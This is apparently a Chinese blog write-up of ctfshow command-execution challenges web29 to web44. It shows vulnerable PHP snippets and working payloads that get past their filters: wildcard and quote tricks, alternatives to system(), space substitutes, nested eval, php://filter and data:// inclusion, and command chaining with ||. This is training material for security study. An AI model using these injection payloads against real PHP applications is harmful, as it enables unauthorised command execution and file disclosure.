【ctfshow】命令执行-＞web29-web44

前言

半夜网抑云听歌听emo了

刷会儿题不然睡不着了呜呜呜

红中(hong_zh0)
CSDN内容合伙人、2023年新星计划web安全方向导师、
华为MindSpore截至目前最年轻的优秀开发者、IK&N战队队长、
吉林师范大学网安大一的一名普通学生、搞网安论文拿了回大挑校二、
阿里云专家博主、华为网络安全云享专家、腾讯云自媒体分享计划博主

三刷命令执行了，怀念捏

web29

 <?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

第一题，相当于啥都没过滤。

Payload:
?c=system("tac fl??????")//?通配符
?c=system("tac fl*");//*通配符
?c=system("tac fl\ag.php");//\分割
?c=system("tac fl''ag.php");//''分割

web30

 <?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

ban了system()，考虑替代方案

Payload:
?c=passthru("tac fl\ag.p\hp");

命令执行中可以替代system函数的有
1、exec()
2、passthru()
3、反引号/shell_exec()

区别在于：
system()/passthru()
直接将结果输出到浏览器
exec()/shell_exec()/反引号
需要通过echo/return来查看结果

web31

 <?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

相较于上一题过滤多点：点，空格，单引号

Payload:
?c=passthru("nl%09fl*");//纯绕
?c=eval($_GET[1]);&1=system("tac flag.php");//类似于一个跳板

空格被Ban：
${IFS}

%09

%0a（二者差别主要在于前者通常插在中间而后者一般放在末尾）

读取文件语句：

nl*（输出带行号）

cat/tac(二者一正序一倒序)

关于跳板

已知浏览器需要一个名为c的变量，这个跳板的原理就是c的值是要再读取一个值，这个值将不受任何限制。

web32

 <?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

这又把(过滤了，没招，用包含做

Payload:
?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

后面伪协议随便拿个hackbar跑就行

出来一串base64编码

直接解码出flag

web33-36

用上一题的方法通杀了

web37

 <?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

换姿势了，得包含。

data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

data协议包含，然后直接传命令

<?php system('cat flag.php');?>

记得编码再传

web38-web39

用上题方法通杀

web40

我是彩笔，不会，建议看师傅WPctf.show

web41

我都忘了我啥时候写的

。。。

我是彩笔(肯定

web42

 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

出现了一个奇怪的东西

>/dev/null 2>&1

建议看这篇博客>/dev/null 2>&1

省流：

这个玩意就类似一个垃圾桶，屏蔽所有输出以及报错

Payload:
?c=cat flag.php%0a//%0a截断
?c=cat flag.php||//||截断
?c=tac flag.php%26%26ls//传两个值进去，垃圾桶只能吃一个
?c=tac flag.php;//分号直接截断

web43

 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

把分号ban了

没事，||接着绕

Payload:
?c=tac flag.php||

web44

不开环境了，估计就是在上一题的基础上把flag ban了

?c=tac fl*||

不写了，古耐